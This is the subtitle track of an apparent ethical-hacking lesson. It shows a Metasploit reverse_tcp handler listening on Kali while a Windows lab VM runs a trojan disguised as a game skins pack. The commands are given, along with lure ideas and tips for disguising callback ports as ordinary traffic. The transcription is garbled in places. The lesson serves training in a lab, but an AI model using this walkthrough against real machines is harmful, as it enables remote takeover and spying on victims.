1
00:00:03,110 --> 00:00:06,350
Now it's time to infect our Windows 10.

2
00:00:06,620 --> 00:00:11,600
P.C. so that we can take remote control and do the command and control section.

3
00:00:11,960 --> 00:00:13,700
That's coming up for our next section.

4
00:00:14,060 --> 00:00:18,650
We have turned off our virus and threat protection settings and our Windows firewall.

5
00:00:18,980 --> 00:00:24,120
We have served up our virus on our Web server and Kalli.

6
00:00:24,710 --> 00:00:26,270
Now we just need to do a couple of things.

7
00:00:26,280 --> 00:00:32,030
The first thing that we want to do every time we are trying to infect a remote machine for security

8
00:00:32,030 --> 00:00:34,850
testing or for testing inside your organization.

9
00:00:35,300 --> 00:00:42,190
We want to listen for those infected pieces on our Caleigh Linux machine in Medda Spoilt.

10
00:00:42,560 --> 00:00:44,330
So come back to your meds, play shell.

11
00:00:44,330 --> 00:00:51,470
And if you've closed that, you can always reopen it just by running MSF console or clicking on exploitation

12
00:00:51,470 --> 00:00:55,790
tools, US play framework because we can start at this stage.

13
00:00:55,880 --> 00:01:01,660
Every time we want to reinfect using this same virus, as long as our IP address stays the same, we're

14
00:01:01,660 --> 00:01:07,220
going to be able to reinfect computers over and over and over again by using this same exploit.

15
00:01:07,250 --> 00:01:14,000
This one Windows virus can infect hundreds of pieces on your local area network or across the Internet.

16
00:01:14,030 --> 00:01:16,240
We're just going to use it in a very safe environment.

17
00:01:17,040 --> 00:01:23,060
But attackers can infect up to 65000 computers at one time from just one of these windows, much pepper

18
00:01:23,090 --> 00:01:23,540
shells.

19
00:01:23,930 --> 00:01:26,180
So we're gonna use the exploit multi handler.

20
00:01:26,210 --> 00:01:28,520
That's can I listen for incoming connections?

21
00:01:28,850 --> 00:01:32,810
We're going to set the payload to listen for those reverse TCAP connections coming in.

22
00:01:33,290 --> 00:01:38,060
I'm going to you show up soon just so you can see what we can set in there will set our local host one

23
00:01:38,060 --> 00:01:44,780
more time so that our Windows Materne operator Shell will have a place to call back to on our Caleigh

24
00:01:44,780 --> 00:01:45,320
computer.

25
00:01:45,830 --> 00:01:53,870
So what I'm going to do is control L to clear the screen and I'm going to say use, exploit, slash,

26
00:01:53,930 --> 00:01:56,810
multi slash handler.

27
00:01:58,650 --> 00:02:05,310
This is a tool inside met a split that allows us to listen for or handle different virus payloads,

28
00:02:05,340 --> 00:02:07,800
calling back into the Kalli computer.

29
00:02:08,220 --> 00:02:11,250
We're going to set the payload to match that windows reverse TCAP.

30
00:02:11,340 --> 00:02:18,000
So we're gonna say set payload and you can actually start typing out payload and use your TABD autocomplete

31
00:02:18,330 --> 00:02:18,870
windows.

32
00:02:19,890 --> 00:02:27,150
I mean, Callies Medha split framework will allow you to use autocomplete so we can say windows slash

33
00:02:27,240 --> 00:02:32,880
interpreter slash reverse underscore TCAP.

34
00:02:35,830 --> 00:02:36,940
And press enter.

35
00:02:38,830 --> 00:02:44,500
And we can show options so we can see what kinds of options we can have here.

36
00:02:44,890 --> 00:02:48,040
We do need there's a required local host function.

37
00:02:48,100 --> 00:02:49,510
So we've got to set the local host.

38
00:02:49,540 --> 00:02:50,830
That's who we want to call back into.

39
00:02:51,340 --> 00:02:53,040
Notice you can also change the port.

40
00:02:53,080 --> 00:02:58,750
So if you wanna make it look like your DNS traffic on poor 53, if you know some of the famous or some

41
00:02:58,750 --> 00:03:03,160
of the more common Internet ports out there, you can actually set a different port instead of four

42
00:03:03,160 --> 00:03:05,140
four four four, which is the fault here.

43
00:03:05,530 --> 00:03:10,840
You could set it to be port four for three so that it looks like secure web traffic or Port 80, so

44
00:03:10,840 --> 00:03:13,570
that it looks like a regular Web server calling backup.

45
00:03:13,840 --> 00:03:22,750
But we're going to set L host L. host to 10 DRDO dot and use the rest of your IP address.

46
00:03:23,090 --> 00:03:28,480
DOT nine seven is the IP address on my machine and you can run IP space A if you don't remember your

47
00:03:28,480 --> 00:03:29,410
IP address on Kelly.

48
00:03:30,820 --> 00:03:32,410
And then all we have to do next.

49
00:03:32,410 --> 00:03:34,060
And there are a couple of things we could do next.

50
00:03:34,060 --> 00:03:36,450
We could say exploit Dash J, Dash Z.

51
00:03:36,760 --> 00:03:41,890
That would listen for multiple connections coming in in the background if we were exploiting a lot of

52
00:03:41,890 --> 00:03:42,370
machines.

53
00:03:42,640 --> 00:03:47,170
But I'm just going to run exploit just e x p l o i t.

54
00:03:48,130 --> 00:03:54,910
And now we are listening for remote TCAP connections coming back in that reverse, TCB handler will

55
00:03:54,970 --> 00:03:58,630
listen for my Windows P.c to phone home after it gets infected.

56
00:03:59,290 --> 00:04:02,500
And so we've got this running on this device.

57
00:04:02,530 --> 00:04:09,700
We want to come back over to Windows and we're going to surf to our CALEIGH address and actually download

58
00:04:09,700 --> 00:04:11,320
and run that virus.

59
00:04:11,710 --> 00:04:17,070
So open up your Web browser and you can install Chrome or Firefox from inside your Windows VM.

60
00:04:17,080 --> 00:04:18,460
So it's a little more realistic.

61
00:04:18,880 --> 00:04:22,510
But a lot of people just use the default edge browser that's built into Windows.

62
00:04:22,960 --> 00:04:24,370
We need to give it the address.

63
00:04:24,450 --> 00:04:27,620
Ten oh dot nine, dot seven.

64
00:04:27,910 --> 00:04:32,830
And remember, slash share is the share folder inside that Caleigh machine.

65
00:04:32,860 --> 00:04:35,610
And look at that hour fortnight all skins.

66
00:04:35,620 --> 00:04:40,270
Daddy XY is right there ready for somebody to serve up.

67
00:04:40,570 --> 00:04:44,950
So the way this would work in a real world attack is somebody would say, hey, download this new Skins

68
00:04:44,950 --> 00:04:48,970
pack, you'll get all of the abilities that you want in 49, all the skins.

69
00:04:49,690 --> 00:04:51,670
Lots of other cool extras built in there.

70
00:04:52,150 --> 00:04:56,440
And they would click on it or somebody says, Oh, I need you to look at this invoice, make sure you

71
00:04:56,440 --> 00:04:57,550
go to download this file.

72
00:04:57,580 --> 00:05:03,040
Or you could just attach it to an email, attach the whole executable, even though a lot of executables

73
00:05:03,040 --> 00:05:06,400
get cut out of emails these days by spam filters.

74
00:05:06,940 --> 00:05:11,230
So you just send them the link and say, hey, go here and download the file and tell me what you think

75
00:05:11,230 --> 00:05:14,470
about this invoice sending what you think about this candidate for us to hire.

76
00:05:15,250 --> 00:05:20,290
What's this funny set of videos, whatever it may be, and executable is not the only format that we

77
00:05:20,290 --> 00:05:21,040
can do in medicine.

78
00:05:21,040 --> 00:05:26,980
What we can actually send a PDAF or a movie file and actually infect someone's computer using some exploits

79
00:05:26,980 --> 00:05:34,450
for a viral vulnerable version of a PDA feature or of a media player as well.

80
00:05:35,050 --> 00:05:38,670
So for not all Skins Daddy XY, we will download that.

81
00:05:38,740 --> 00:05:43,060
And Windows is gonna try to warn us a little bit what you want to do with this.

82
00:05:43,090 --> 00:05:46,810
You don't want to run it because we actually want to be able to run this multiple time, so I'm going

83
00:05:46,810 --> 00:05:47,620
to save it.

84
00:05:48,740 --> 00:05:55,100
Download it and I will open the folder, and because we turned off a virus and threat protection settings,

85
00:05:55,490 --> 00:05:56,830
it should download, OK?

86
00:05:56,930 --> 00:05:59,300
And we don't have to worry about the Windows firewall firing up.

87
00:05:59,690 --> 00:06:05,660
So what I'm going to do is run fortnight, all skins, daddy XY and it's going to say, hey, this is

88
00:06:05,660 --> 00:06:07,160
an unrecognized app.

89
00:06:07,370 --> 00:06:08,180
Don't run it.

90
00:06:08,570 --> 00:06:11,650
But if you click on more info, it'll let you run it anyway.

91
00:06:12,140 --> 00:06:17,690
So if you were sending this to somebody to test their ability to to detect when something's going wrong,

92
00:06:17,690 --> 00:06:19,010
they've got a few hints.

93
00:06:19,310 --> 00:06:21,980
But if you tell them, I'll just click through more info and run anyway.

94
00:06:22,550 --> 00:06:23,920
There's a good chance that they'll run it.

95
00:06:23,920 --> 00:06:25,460
And it's something they're interested in.

96
00:06:25,850 --> 00:06:27,170
There's a much better chance.

97
00:06:27,610 --> 00:06:31,430
Now, if you notice, back in our Caleigh machine, it looks like something started happening.

98
00:06:32,000 --> 00:06:33,650
And in fact, it did.

99
00:06:33,800 --> 00:06:44,870
It says that it opened up a reverse TCAP handler on 10 DRDO dot nine, dot nine that as our Windows

100
00:06:45,170 --> 00:06:45,950
computer.

101
00:06:46,730 --> 00:06:55,730
And so now if we want to run a couple of commands, we can actually take remote control of this Windows

102
00:06:55,820 --> 00:06:56,770
virtual machine.

103
00:06:56,810 --> 00:07:04,010
But it could be a laptop, a desktop or Windows Surface tablet, and we would be able to run commands

104
00:07:04,100 --> 00:07:07,640
remotely on that machine through our Materne operator Shell.

105
00:07:07,910 --> 00:07:14,120
So if you were able to run this file and you see after those four lines that we entered before.

106
00:07:14,700 --> 00:07:21,170
If you can see the exploit, open up a session and Materne printer, you are ready to move on to the

107
00:07:21,170 --> 00:07:22,070
next section.

108
00:07:22,070 --> 00:07:28,730
And we're gonna see how to command and control a Windows machine from Kalli using this Trojan, this

109
00:07:28,730 --> 00:07:30,380
remote virus that we've created.

110
00:07:30,800 --> 00:07:36,850
It's going to be a scary few lessons because you can see that attackers can take control of the webcam,

111
00:07:37,010 --> 00:07:41,780
can take control of the keyboard, can take control of the mouse, just about anything that you can

112
00:07:41,780 --> 00:07:44,480
imagine when you run an infected file.

113
00:07:44,510 --> 00:07:47,570
So be careful when you click these downloaded files.

114
00:07:47,900 --> 00:07:53,060
You can see already why it's dangerous to open something just because a friend or just because an email

115
00:07:53,480 --> 00:07:54,140
said to.

116
00:07:54,470 --> 00:07:59,060
But when we come back in the next section, we're going to see how to take full control of this remote

117
00:07:59,060 --> 00:08:04,040
P.C., grab screenshots, keystrokes, and even turn on the webcam remotely.

118
00:08:04,550 --> 00:08:08,120
So come back for the next section and we'll see you there.